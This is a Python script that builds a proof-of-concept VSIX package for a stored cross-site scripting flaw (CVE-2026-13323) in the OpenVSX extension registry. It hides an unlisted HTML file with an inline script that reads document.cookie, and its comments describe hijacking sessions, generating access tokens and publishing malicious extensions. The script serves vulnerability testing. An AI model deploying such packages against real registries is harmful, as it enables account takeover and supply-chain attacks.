import zipfile
import os

# Builds a minimal VSIX package (a zip archive) used as a reproduction fixture
# for CVE-2026-13323. The archive carries an HTML file with an inline script so
# a tester can observe whether a registry serves extension-bundled files inline
# from its own origin. The output file is written to the current working
# directory; mode "w" replaces any existing file of the same name.
vsix_path = "testpub.testext-1.0.0.vsix"

# OPC content-type map for the package. It declares .html as text/html.
# NOTE(review): whether the registry derives the served Content-Type from this
# map or from the file extension is not visible in this script; confirm
# against the server under test.
content_types = """<?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="json" ContentType="application/json"/>
  <Default Extension="html" ContentType="text/html"/>
  <Default Extension="vsixmanifest" ContentType="text/xml"/>
</Types>"""

# Package manifest. Only extension/package.json is declared under <Assets>;
# payload.html travels in the archive without an Asset entry of its own.
vsixmanifest = """<?xml version="1.0" encoding="utf-8"?>
<PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011">
  <Metadata>
    <Identity Language="en-US" Id="testext" Version="1.0.0" Publisher="testpub"/>
    <DisplayName>Test Extension</DisplayName>
    <Description xml:space="preserve">Test extension for CVE reproduction</Description>
    <Tags>__ext_testext</Tags>
    <Categories>Other</Categories>
    <GalleryFlags>Public</GalleryFlags>
    <Properties>
      <Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.51.1" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionDependencies" Value="" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionPack" Value="" />
      <Property Id="Microsoft.VisualStudio.Code.ExtensionKind" Value="workspace" />
      <Property Id="Microsoft.VisualStudio.Code.LocalizedLanguages" Value="" />
    </Properties>
  </Metadata>
  <Installation>
    <InstallationTarget Id="Microsoft.VisualStudio.Code"/>
  </Installation>
  <Dependencies/>
  <Assets>
    <Asset Type="Microsoft.VisualStudio.Code.Manifest" Path="extension/package.json" Addressable="true" />
  </Assets>
</PackageManifest>"""

# Extension manifest; name, publisher and version match the Identity element
# in the VSIX manifest above.
package_json = """{
  "name": "testext",
  "displayName": "Test Extension",
  "description": "Test extension for CVE reproduction",
  "publisher": "testpub",
  "version": "1.0.0",
  "engines": { "vscode": "^1.51.1" },
  "categories": ["Other"],
  "main": "./out/extension.js",
  "contributes": {
    "commands": [{ "command": "testext.hello", "title": "Hello World" }]
  }
}"""

# Marker page. The inline script only writes document.cookie into the page
# title and into a <div id="poc-proof"> on the same page; nothing is sent
# anywhere else.
# Reading the result: document.cookie never includes HttpOnly cookies, so an
# empty cookie value does not mean the script was blocked. The
# JS_EXECUTED_IN_REGISTRY_ORIGIN marker text is the execution signal.
# What a hardened server is expected to show instead: the file delivered as a
# download (Content-Disposition: attachment), or rendered only under a
# sandboxing Content-Security-Policy or from a separate origin for
# user-supplied content, together with X-Content-Type-Options: nosniff, so the
# marker never appears in the registry origin.
# NOTE(review): the actual remediation for this CVE is not shown here; confirm
# against the advisory.
html_payload = """<!DOCTYPE html>
<html>
<head><title>OpenVSX Inline HTML PoC</title></head>
<body>
<h1>CVE-2026-13323 PoC</h1>
<p>This HTML file is served inline from the open-vsx.org origin.</p>
<script>
// In a real attack, this script runs in the open-vsx.org origin context
// and can access session cookies, generate PATs, and publish malicious extensions.
document.title = "EXFIL: " + document.cookie;
var proof = document.createElement("div");
proof.id = "poc-proof";
proof.innerText = "JS_EXECUTED_IN_REGISTRY_ORIGIN cookies=" + document.cookie;
document.body.appendChild(proof);
</script>
</body>
</html>"""

# No-op entry point referenced by "main" in package.json.
extension_js = (
    '// Minimal extension entry point\n'
    'exports.activate = function() {};\n'
    'exports.deactivate = function() {};'
)

# Archive members in write order: (path inside the VSIX, text content).
archive_members = (
    ('[Content_Types].xml', content_types),
    ('extension.vsixmanifest', vsixmanifest),
    ('extension/package.json', package_json),
    ('extension/payload.html', html_payload),
    ('extension/out/extension.js', extension_js),
)

with zipfile.ZipFile(
    vsix_path, mode='w', compression=zipfile.ZIP_DEFLATED
) as z:
    for member_name, member_text in archive_members:
        z.writestr(member_name, member_text)

# Report the size of the archive that was just written.
size_bytes = os.path.getsize(vsix_path)
print(f"Created {vsix_path} ({size_bytes} bytes)")
